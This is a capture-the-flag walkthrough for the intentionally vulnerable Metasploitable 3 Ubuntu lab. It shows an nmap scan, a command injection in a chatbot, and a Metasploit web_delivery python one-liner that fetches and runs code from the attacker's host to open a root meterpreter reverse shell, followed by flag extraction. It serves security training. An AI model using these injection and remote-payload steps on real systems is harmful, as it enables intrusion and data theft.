---
title: Ace of Clubs
description: Metasploitable 3 Ubuntu - Ace of Clubs
extends: _layouts.documentation
section: content
---

# Ace of Clubs

1\. First, get logged into your Kali Linux instance. Checkout the [Quickstart Guide](/walkthroughs/metasploitable-3-ubuntu/quickstart/) if you're not sure how to do this. 

Next let's start off by running an `nmap` scan on our target from your Kali Linux instance: `nmap -p 1-65535 165.22.171.133`.
Here's a quick explanation of what this command does.

* `nmap` - Start the `nmap` tool, a utility for network discovery and security auditing.
* `-p 1-65535` - Specify the ports to scan
* `165.22.171.133` - target IP address to scan (replace `165.22.171.133` with the IP address of your Metasploitable instance).

And this is what the result will look like from your command line:
```bash
hacker-lab@1e0f79a46253:~$ nmap -p 1-65535 165.22.171.133
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-23 22:24 UTC
Nmap scan report for 165.22.171.133
Host is up (0.00047s latency).
Not shown: 65514 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
1139/tcp open  cce3x
1180/tcp open  mc-client
1445/tcp open  proxima-lm
1617/tcp open  nimrod-agent
2322/tcp open  ofsd
3000/tcp open  ppp
3306/tcp open  mysql
3389/tcp open  ms-wbt-server
3500/tcp open  rtmp-port
4848/tcp open  appserv-http
5985/tcp open  wsman
6697/tcp open  ircs-u
8020/tcp open  intu-ec-svcdisc
8080/tcp open  http-proxy
8181/tcp open  intermapper
8282/tcp open  libelle
8383/tcp open  m2mservices
8484/tcp open  unknown
8585/tcp open  unknown
9200/tcp open  wap-wsp
```

>Hint: `nmap` is an open source command line tool for network exploration and security auditing.
>We're using it here to scan for open ports, and services running on those ports.
>Checkout the [official documentation](https://nmap.org/) for the `nmap` tool to learn more.

2\. Walk through each of the open ports discovered in the `nmap` scan until we discover a web server being served on port 1180 in your browser where we can see an open directory.

<img src="/assets/images/walkthroughs/metasploitable-3-ubuntu/ace-of-clubs/1-port-80.PNG">

3\. Explore the links until you find a chat app.

<img src="/assets/images/walkthroughs/metasploitable-3-ubuntu/ace-of-clubs/2-chat.PNG">

3\. Interact with the chat app, until you find a possible command injection vulnerability. 
It looks like submitting the pattern `do you know x` will result in an answer that looks like the output from the `/etc/passwd` file.
```bash
# hmmmm this answer makes it seem like it runs some kind of command on "flag" behind the scenes. 
# that's interesting let's explore this further.
(8:31 PM) wes: do you know flag
(8:31 PM) Papa Smurf: Ain't nobody knows this dude: flag

# looks like it searches the /etc/passwd file for whatever text in the pattern "do you know x"
(8:32 PM) wes: do you know root
(8:32 PM) Papa Smurf: Oh yeah I know this dude. He cool. He cool. Check this out I know the 
credential too:root:x:0:0:root:/root:/bin/bash 
(8:32 PM) Papa Smurf: zzzzzzzz.....
```

4\. Let's test our theory by entering: `do you know blah; ls` and it works! prints out the `/etc/passwd` file

```bash
(8:32 PM) wes: do you know root; ls
(8:32 PM) Papa Smurf: Oh yeah I know this dude. He cool. He cool. Check this out I know the 
credential too:root:x:0:0:root:/root:/bin/bash 
bin boot dev etc home initrd.img lib lib64 lost+found media mnt node_modules opt proc root run sbin srv sys tmp usr var vmlinuz 
```

5\. Let's use metasploit's **web delivery auxiliary module** to get a meterpreter shell on the victim machine.

>Hint: The web delivery auxiliary module creates a server on our Kali instance. 
>When the victim connects to it, the payload will be executed on the victim machine.
>In our case we'll execute a meterpreter payload. See the [Offensive Security Documentation](https://www.offensive-security.com/metasploit-unleashed/web-delivery/) to learn more about this module.

Start up metasploit
```bash
root@78ca8560af3d:~# msfconsole
```

Use the web delivery module
```bash
msf5 > use exploit/multi/script/web_delivery
```

Show the available options for this module
```bash
msf5 exploit(multi/script/web_delivery) > show options

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Python
```

6\. First we'll set the `SRVPORT` option to port `9990`
This tells the module to run the payload server on port `9990`.

We're using port `9990` because [thehackerlab.co](https://thehackerlab.co) configures it's Kali Linux machines to keep ports `9990-9999` open and forwards them to the outside world.
You can use any open port that's available if you've setup Kali Linux manually.

```bash
msf5 exploit(multi/script/web_delivery) > set SRVPORT 9990
SRVPORT => 9990
```

7\. Now let's set the `payload` option.
This tells the module what payload to deliver to the victim machine on execution.
In this case we're going to execute a meterpreter payload.
```bash
msf5 exploit(multi/script/web_delivery) > set paylod python/meterpreter/reverse_tcp
paylod => python/meterpreter/reverse_tcp
```

Let's show our options again to see if our payload has any new options.
```bash
msf5 exploit(multi/script/web_delivery) > show options

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  9990             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Python
```

8\. Let's set the `LHOST` option to the IP address of our Kali Linux instance.
This tells the module to have the victim connect back to the specified IP address.

Replace `104.248.222.201` with the IP address of your Kali instance.
```bash
msf5 exploit(multi/script/web_delivery) > set LHOST 104.248.222.201
LHOST => 104.248.222.201
```

Let's setup our payload to listen on port `9991` by specifying the `LPORT` option.
Note that `LPORT` specifies what port our payload (meterpreter shell) will listen on, 
versus setting the `RPORT` specifies what port our delivery module uses to deliver the payload.
```bash
msf5 exploit(multi/script/web_delivery) > set LPORT 9991
LPORT => 9991
```

9\. Run exploit.
This will generate a command, that when executed on the victim machine, will connect back to our Kali Linux instance and execute the payload on itself.
```bash
msf5 exploit
msf5 exploit(multi/script/web_delivery) > [*] Local IP: http://172.18.0.2:9990/EUdcKJQ4h5JSE
[*] Server started.
[*] Run the following command on the target machine:
python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://104.248.222.201:9990/EUdcKJQ4h5JSE');exec(r.read());"
```

10\. Recall that we can inject any command into the chat app by submitting a message following the pattern "do you know x; [command to inject]"

Use a url encoder like [urlencoder.org](https://www.urlencoder.org/) to encode our command, and then submit it to the chat app using the pattern we found.
<img src="/assets/images/walkthroughs/metasploitable-3-ubuntu/ace-of-clubs/5-exploit.PNG">

11\. This is what your metasploit console should look like if you've done everything right
```bash
[*] 138.68.232.76    web_delivery - Delivering Payload
[*] Sending stage (53755 bytes) to 138.68.232.76
[*] Meterpreter session 1 opened (172.18.0.2:9991 -> 138.68.232.76:47822) at 2019-05-16 22:29:50 +0000
```

12\. List available sessions
```bash
msf5 exploit(multi/script/web_delivery) > sessions -i

Active sessions
===============

  Id  Name  Type                      Information                    Connection
  --  ----  ----                      -----------                    ----------
  1         meterpreter python/linux  root @ metasploitable3-ub1404  172.18.0.2:9991 -> 138.68.232.76:47822 (10.0.2.15)
```

> Tip: Reference [Metasploit Basics](https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/) to learn more about sessions.

13\. Use session 1
```bash
msf5 exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > whoami
[-] Unknown command: whoami.
meterpreter > getuid
Server username: root
```

14\. Poke around we find the chat app.
```bash
meterpreter > pwd
/opt
meterpreter > ls
Listing: /opt
=============

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40644/rw-r--r--  4096  dir   2018-07-29 13:09:11 +0000  apache_continuum
40700/rwx------  4096  dir   2018-07-29 13:18:50 +0000  chatbot
40775/rwxrwxr-x  4096  dir   2018-07-29 13:07:22 +0000  chef
40770/rwxrwx---  4096  dir   2018-07-29 13:20:25 +0000  docker
40755/rwxr-xr-x  4096  dir   2018-07-29 13:14:56 +0000  proftpd
40755/rwxr-xr-x  4096  dir   2018-07-29 13:20:06 +0000  readme_app
40777/rwxrwxrwx  4096  dir   2019-05-02 20:23:11 +0000  sinatra
40100/--x------  4096  dir   2018-07-29 13:17:50 +0000  unrealircd

meterpreter > search -f index.php
Found 1 result...
    ./chatbot/chat\index.php (3391 bytes)

```

15\. Look in the chat app we see papa_smurf. Download the chat directory using the `download` command.
```bash
meterpreter > download -r chatbot

...a ton of files get downloaded

# exit meterpreter so we can work with the downloaded file
meterpreter > exit
```

16\. Explore the directory further until we find a flag.
```bash
# this papa_smurf directory looks interesting
root@78ca8560af3d:~/chatbot/papa_smurf# grep -Hrn 'flag' ./ | less

# base64 encoded file, a flag???
./chat_client.js:10:var flag = "iVBORw0KGgoAAAANSUhEUgAAA...
```

17\. Decode the image

* `grep iVBORw0K` - filter results to the line that contains the string "hearts"
* `awk -F '"' '{print $2}'` - print the word of the line returned from grep. Which in this case is the base64 encoded string.
* ` base64 -d > ace_of_clubs.png` - decode the string into five_of_hearts.png

```bash
root@78ca8560af3d:~/chatbot/papa_smurf# cat chat_client.js | grep iVBORw0K | awk -F '"' '{print $2}' | base64 -d > ace_of_clubs.png
root@78ca8560af3d:~/chatbot/papa_smurf# mv ace_of_clubs.png ~/
```

18\. Back on my local computer grab the image.
Replace `104.248.222.201` with the IP address of your Kali instance.
```bash
wagena@81994499c1ad:~/projects$ scp -i ../hacker-lab hacker-lab@104.248.222.201:/home/hacker-lab/ace_of_clubs.png ./
```

19. And the flag!

<img src="/assets/images/walkthroughs/metasploitable-3-ubuntu/ace-of-clubs/ace_of_clubs.png">